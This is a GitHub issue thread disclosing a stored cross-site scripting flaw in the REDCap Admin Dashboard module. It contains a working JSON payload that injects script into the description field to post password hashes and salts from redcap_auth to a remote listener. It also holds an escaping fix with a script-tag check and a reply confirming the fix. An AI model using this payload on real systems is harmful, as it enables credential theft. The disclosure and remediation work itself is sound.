ui-icts / redcap-admin-dashboard

Provides a sortable table view of various reports on REDCap metadata
MIT License

XSS vulnerability #6

Closed utiso closed 2 years ago

utiso commented 3 years ago

Admin Dashboard 3.5.2 has a cross-site scripting vulnerability.

When creating a new project (POSTing to /ExternalModules/?prefix=admin_dash&page=requestHandler&type=saveReportSettings), a malicious user can inject JavaScript into the "description" field. The example JSON below injects JavaScript that will POST the contents of UIOWA_AdminDash.data (in this case a dump of the table redcap_auth) to a remote server (in this case localhost).

{
    "reportReference": [{
        "reportName": "Pwned",
        "description": "<script>$.ajax({ url:'http://localhost:4444', data: JSON.stringify(UIOWA_AdminDash.data), method:'POST', success: function(){alert('Data exfiltrated');} });</script>",
        "tabIcon": "biohazard",
        "customID": "",
        "sql": "select username,password,password_salt from redcap_auth",
        "type": "table",
        "checked": true,
        "formatting": {
            "0": {
                "column": "username",
                "display": 0,
                "link": "not set"
            },
            "1": {
                "column": "password",
                "display": 0,
                "link": "not set"
            },
            "2": {
                "column": "password_salt",
                "display": 0,
                "link": "not set"
            }
        }
    }],
    "adminVisibility": {
        "Projects by User": true,
        "Users by Project": true,
        "Research Projects": true,
        "Development Projects": true,
        "All Projects": true,
        "Projects with External Modules": true,
        "Pwned": true
    },
    "executiveVisibility": {
        "Projects by User": [],
        "Users by Project": [],
        "Research Projects": [],
        "Development Projects": [],
        "All Projects": [],
        "Projects with External Modules": [],
        "Pwned": []
    }
}

To fix this, please sanitize all user input.
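The fix the report asks for, shown as an added example that is not part of the issue and not the redcap-admin-dashboard module's own code: HTML-escape the user-supplied fields of a reportReference[] entry before they are rendered as markup, so the description payload above lands in the page as inert text. The markup layout and the tabIcon allow-list are assumptions for illustration, not the module's actual rendering code.

```javascript
// Added example: render one report entry from the saveReportSettings JSON
// with every user-controlled field escaped. Not the module's own code.

// Escape the five characters that let text break out of HTML text or
// attribute context. Everything else passes through unchanged.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Icon names are identifiers, not markup: allow-list them instead of
// escaping (hypothetical check; the issue does not describe one).
function safeIconName(name) {
  return /^[a-z0-9-]{1,40}$/i.test(String(name)) ? String(name) : 'file';
}

// The "after" form of the renderer: every interpolated value is escaped.
// The vulnerable "before" is the same template with raw report.description.
// The element layout below is assumed, not taken from the module.
function renderReportHtml(report) {
  return `<div class="report">` +
    `<span class="icon-${safeIconName(report.tabIcon)}"></span>` +
    `<h3>${escapeHtml(report.reportName)}</h3>` +
    `<p>${escapeHtml(report.description)}</p>` +
    `</div>`;
}

// Constructed copy of the report entry from the issue above, trimmed to the
// fields the renderer touches.
const PWNED_REPORT = {
  reportName: 'Pwned',
  description: "<script>$.ajax({ url:'http://localhost:4444', data: JSON.stringify(UIOWA_AdminDash.data), method:'POST' });</script>",
  tabIcon: 'biohazard',
};

// Defender-side check: does any raw <script tag survive rendering?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// True when the rendered markup for a report carries no live script tag.
function isInert(report) {
  return !containsScriptTag(renderReportHtml(report));
}

console.log(isInert(PWNED_REPORT) ? 'description rendered as text' : 'XSS still possible');
```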

biggeeves commented 2 years ago

Tested using Oct 28, 2021 code version. The Description is sanitized. Tested in version 4.0.5. This could be closed.